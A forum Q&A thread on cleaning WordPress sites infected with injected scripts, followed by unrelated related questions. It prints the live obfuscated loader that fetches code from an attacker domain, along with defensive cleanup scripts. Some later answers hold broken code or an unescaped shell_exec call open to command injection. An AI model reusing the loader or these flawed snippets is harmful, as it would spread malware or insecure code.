My WordPress websites are infected with malicious code. What can I do to regain data or backup? Websites are showing blank page or redirect to some malicious URL. The below code (and similar) were injected in many pages (also many files with different names were created) :
<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
Some of my infected websites (warning: visiting may infect) :
https://lahuriyaconstruction.com/
https://getnonveg.com/
Same here - open your database in phpmyadmin and enter the following in SQL box:
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
It will clean all posts from the script, but you have to look where the entries come from.
I have faced this issue with more than 5 WordPress websites,
I fixed it by replacing all dock.lovegreenpencils.ga links with "#" to make it point to nowhere.
1 . Run this command inside your WordPress directory
grep -r "lovegreenpencils" .
You should be able to see all files that are infected:
Replace all links using this command
find . -name "*.php" |xargs sed -i "s/https:\/\/dock.lovegreenpencils.ga\/m.js?n=ns1/#/g"
It will replace all matched scripts with "#"
Clean any script added to your WP content
UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://dock.lovegreenpencils.ga/m.js?n=nb5' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
Links could end with m.js?n=nb5 or m.js?n=ns1 don't forget to remove both.
UPDATE:
THIS Milcouse code Also generates the script URLs from charCode In order not to be searchable.
String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115)
Make sure to get rid of it as well.
The above steps brought my website back to work.
There are a few things you can do to clean your Wordpress sites:
1- Visually check your public_html folder where your Wordpress is installed. You may see strange filenames in your root folder as well as wp-includes, wp-content or wp-admin folders and subfolders.
2- Check if any code injected into index.php (inside root folder) and wp-config.php
3- Install Wordfence plugin and do a manual scan. It will go through your wordpress installation, plugins and theme files and report anything unusual.
4- After all these, using Chrome Developer Tools' network tab, refresh your page and check if there are connections to malicious-looking urls.
Here is the script I created to clear the infected files on my sites...
Hopefully it helps. This is all I can do for you...
As mentioned you also have to remove the crap in post_content from wp_posts with the following SQL:
UPDATE wp_posts SET post_content = REPLACE(post_content,"",'') WHERE post_content LIKE '%lovegreenpencils%'
and add back in your domain url in the siteurl/home option under wp_options.
Save the following code into a php file and change the settings to get it to work on your system.
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('memory_limit',"256M");
ob_implicit_flush(1);
ob_start();
$backup_dir = "/var/badfiles";
$html_dir = "/var/www";
if(!is_dir($backup_dir)) mkdir($backup_dir);
$dir_iterator = new RecursiveDirectoryIterator($html_dir);
$iterator = new RecursiveIteratorIterator($dir_iterator, RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $file) {
if($file == __FILE__) continue;
if (pathinfo($file, PATHINFO_FILENAME) == "wp-beckup") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_FILENAME) == "lte_") {
backup_file($file);
if(unlink($file)) {
echo "[LGP Found]: Removed and Backed Up ({$file})<br>";
}
}
$bad_text = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>";
if (pathinfo($file, PATHINFO_EXTENSION) == "php" ) {
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "html") {
$bad_text = "<script type='text/javascript' src='https://dock.lovegreenpencils.ga/m.js?n=nb5'></script>";
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
$bad_text = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();";
if (pathinfo($file, PATHINFO_EXTENSION) == "jshintrc" || pathinfo($file, PATHINFO_EXTENSION) == "map" || pathinfo($file, PATHINFO_EXTENSION) == "jsx" || pathinfo($file, PATHINFO_EXTENSION) == "php" || pathinfo($file, PATHINFO_EXTENSION) == "js" || pathinfo($file, PATHINFO_EXTENSION) == "gz" || pathinfo($file, PATHINFO_EXTENSION) == "json") {
$contents = file_get_contents($file);
if(strpos($contents, $bad_text) !== false) {
backup_file($file);
$contents = str_replace($bad_text, '', $contents);
file_put_contents($file, $contents);
echo "[LGP Found]: Code Removed and Backed Up ({$file})<br>";
}
}
if (pathinfo($file, PATHINFO_FILENAME) == "wp-blog-header" && pathinfo($file, PATHINFO_EXTENSION) == "php") {
$contents = file_get_contents($file);
if(strpos($contents, 'MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=') !== false) {
backup_file($file);
$contents = substr($contents, strpos($contents, "cGFnZV9ub3RfZm91bmRfNDA0")+32);
file_put_contents($file, $contents);
echo "[VCD Found]: Code Removed and Backed Up ({$file})<br>";
}
}
}
function backup_file($file) {
global $backup_dir;
$contents = file_get_contents($file);
if(!is_dir(dirname($backup_dir.$file))) {
mkdir(dirname($backup_dir.$file),0777,true);
}
file_put_contents($backup_dir.$file, $contents);
}
DON'T FORGET TO BACKUP!!
I encountered this malware and wrote a script to clean it. Here's the link to that: https://gist.github.com/black-dragon74/86fc18a91e814019228c02531f0ea01c
Please note, this malware also spreads itself to the DB. To clean the DB, the regex is at the top of the file. Or you can just run: perl -pi.bak -e "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" infected_db.sql
Also, If you get to know of any other URLs that it is maliciously injecting, please let me know, I'll update the script to include that.
Regards
in my case, it was had lots of code I have copied all code from post_content column from wp_post or your table name and replace with all.
UPDATE wplm_posts SET post_content = REPLACE(post_content,"{{{WITHOUT BRACKET -- Your code here that is in Column Post_content}}}",'') WHERE post_content LIKE '%lovegreenpencils%'
in my case my code in post_content column was:
<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>
This code is worked to me.
UPDATE wplm_posts SET post_content = REPLACE(post_content,"<script src='https://port.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script><script src='https://trend.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script><script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>",'') WHERE post_content LIKE '%lovegreenpencils%'
Related
I build a csv export using the admin folder. The file is well uploaded into my public folder.
But when I try to download it using the return, I have an error:
The file "/public/exportCSV.csv" does not exist
I can't understand why, I hope you have an idea. Thanks. I'm under Symfony 4.
$admins = $userRepository->findByRole(User::ROLE_ADMIN);
$filename='exportCSV';
$extension='csv';
$request = Request::createFromGlobals();
if($request->query->get('exportCSV')!= null){
$output = fopen($filename.'.'.$extension, 'w');
fputcsv($output, array("Id","Nom","Prénom","Activé","Dernière connexion","Date d'inscription","Url avatar","Email","Username"));
foreach ($admins as $admin){
$id=$admin->getId();
$lastname=$admin->getLastName();
$firstname=$admin->getFirstName();
$activeState=$admin->getActiveState();
if($activeState){
$active='Oui';
}else{
$active='Non';
}
$lastConnectedAt=$admin->getLastConnected();
if($lastConnectedAt==null){
$lastConnected=" ";
}else{
$lastConnected=$lastConnectedAt->format('Y-m-d H:i:s');
}
$createdAt=$admin->getCreatedAt();
if($createdAt==null){
$created=" ";
}else{
$created=$createdAt->format('Y-m-d H:i:s');
}
$urlAvatar=$admin->getUrlAvatar();
$mail=$admin->getEmail();
$username=$admin->getUsername();
$csvLine= array($id,$lastname,$firstname,$active,$lastConnected,$created,$urlAvatar,$mail,$username);
fputcsv($output,$csvLine);
}
return $this->file('/public/'.$filename.'.'.$extension);
}
You must use the correct path to webserver "public" dir. Check https://stackoverflow.com/a/48585423/3497902
In your example, you can do same like ...
$publicDir = $this->getParameter('kernel.project_dir') . '/public/'; # Your controller must extend AbstractController
$output = fopen($publicDir . $filename.'.'.$extension, 'w');
I´ve just installed a wordpress multisite installation (version 4.2.1) with mapped domains.
For each site the url for an uploaded image which is shown in the browser is http://URL/wp-content/uploads/sites/SITENUMBER/DATE/... and the folder is /path/to/wordpress/wp-content/uploads/sites/SITENUMBER/DATE/....
But I want to use the local path /path/to/wordpress/wp-content/uploads/sites/SITENUMBER/... and want to see in the browser http://URL/wp-content/uploads/DATE/... (like in a single wordpress site).
I´ve read a much about that and I think I know that the option "UPLOAD URL PATH" normally should rewrite this, doesn´t it? But for me it doesn´t work. How could I customize wordpress to fit it?
Update: I´ve found out that in functions.php are define that multisites will get a rewrite of the URL:
// If multisite (and if not the main site in a post-MU network)
if ( is_multisite() && ! ( is_main_network() && is_main_site() && defined( 'MULTISITE' ) ) ) {
if ( ! get_site_option( 'ms_files_rewriting' ) ) {
/*
* If ms-files rewriting is disabled (networks created post-3.5), it is fairly
* straightforward: Append sites/%d if we're not on the main site (for post-MU
* networks). (The extra directory prevents a four-digit ID from conflicting with
* a year-based directory for the main site. But if a MU-era network has disabled
* ms-files rewriting manually, they don't need the extra directory, as they never
* had wp-content/uploads for the main site.)
*/
if ( defined( 'MULTISITE' ) )
$ms_dir = '/sites/' . get_current_blog_id();
else
$ms_dir = '/' . get_current_blog_id();
$dir .= $ms_dir;
$url .= $ms_dir;
...
}}
But I didn´t know how I could change this to get the needed behavior.
Yes you can change your upload directory in WordPress using below function.
add_filter( 'upload_dir', 'upload_dir_filter' );
function upload_dir_filter( $upload ) {
$dir = $_SERVER['DOCUMENT_ROOT'];
$upload_dir = $dir['basedir'] . '/uploads/date';
$upload_url = $dir['baseurl'] . '/uploads/date';
wp_mkdir_p( $upload_dir ); //WordPress will check if the dir exists and can write to it.
$upload['path'] = $upload_dir;
$upload['url'] = $upload_url;
return $upload;
}
I've just started using grunt-init. I have everything working, except I'm finding that any images/*.png files in my template get corrupted in transit to the destination folder.
I suspect that the init.copyAndProcess function is corrupting them (they open in Gimp from the template folder but not the destination folder).
How can I do a copy instead of copyAndProcess for a subset of the files in my template? Preferably using a pattern like 'images/**' to identify the files.
You actually can use filesToCopy, since you pass a noprocess hash, telling to grunt-init the files it should not process.
Refer to http://gruntjs.com/project-scaffolding#copying-files (grunt-init documentation)
and an example at line 73 of this commit https://github.com/gruntjs/grunt-init-jquery/blob/ecf070d7469d610441458111bc05cd543ee5bbc0/template.js.
Well, I would have preferred something more concise, similar to what was already in the template.js:
var files = init.filesToCopy( props );
init.copyAndProcess( files, props );
But this works:
var src_path = init.srcpath( 'images/' );
var dest_path = init.destpath( ) + '/images/';
// Copy the images folder this way to prevent corrupting the files
grunt.file.recurse( src_path, function( abspath, rootdir, subdir, filename ) {
if ( subdir == undefined ) {
var dest = dest_path + filename;
} else {
var dest = dest_path + subdir + '/' + filename;
}
grunt.file.copy( abspath, dest );
});
Is there a way I can move my Wordpress domain configuration settings:
siteurl
home
from the database wp-options table to wp-config.php?
I want to be able to sync my live DB with my localhost at times for development purposes, but it's annoying having to change these settings in the database each time.
I'm using git, and have a wp-config.production.php, and wp-config.testing.php in my repository, which is symlinked with Capistrano upon deployment, so ideally I want to add my domain settings to these files respectively.
I came up with the following solution, seems to work okay:
Add the following to wp-config.php
/** Domain settings (No trailing slash!)*/
define ('SITEURL', 'http://domain.dev');
define ('HOME', 'http://domain.dev');
Then in function.php add:
<?php
update_domain_settings();
/**
* update_domain_settings
*/
function update_domain_settings()
{
$domain_updated = false;
if(get_option('siteurl') != SITEURL) {
update_option('siteurl', SITEURL);
$domain_updated = true;
}
if(get_option('home') != HOME) {
update_option('home', HOME);
$domain_updated = true;
}
if($domain_updated === true) {
header("Location: " . home_url());
exit;
}
}
It's important to omit the trailing slash in the SITEURL and HOME otherwise you'll end up with a recursive redirection problem.
In drupal when i am uploading a .doc,.pdf files I need to display the preview of the whole document after it get uploaded may i know the answer
I've solved this issue with php, here are the functions that I wrote:
//requires imagemagick which is on most servers
function thumbFromPDF($path, $page=0){
$im = new imagick($path.'['.$page.']');
$im->setImageFormat('png');
$im->writeImage( '/tmp/img.png' );
$im=imagecreatefrompng('/tmp/img.png');
return $im;
}
function thumbFromDoc($path, $page=0){
$cmd='unoconv --server localhost --port 2002 --stdout -f pdf '.$path;//-f could be pdf, txt, or html
$pdf = shell_exec ( $cmd );
$outfilefile='/tmp/pdf.pdf';
if (! $handle = fopen ( $outfilefile, 'w' )) {
die("Cannot open file ($outfilefile)");
return false;
}
// Write $somecontent to our opened file.
if (fwrite ( $handle, $pdf ) === FALSE) {
die("Cannot write to file ($location$file)");
return false;
}
fclose ( $handle );
return thumbFromPDF($outfilefile,$page);
}
Read this article for more information:
http://www.lampdeveloper.co.uk/linux/converting-doc-to-pdf-txt-or-html-using-php-and-linux.html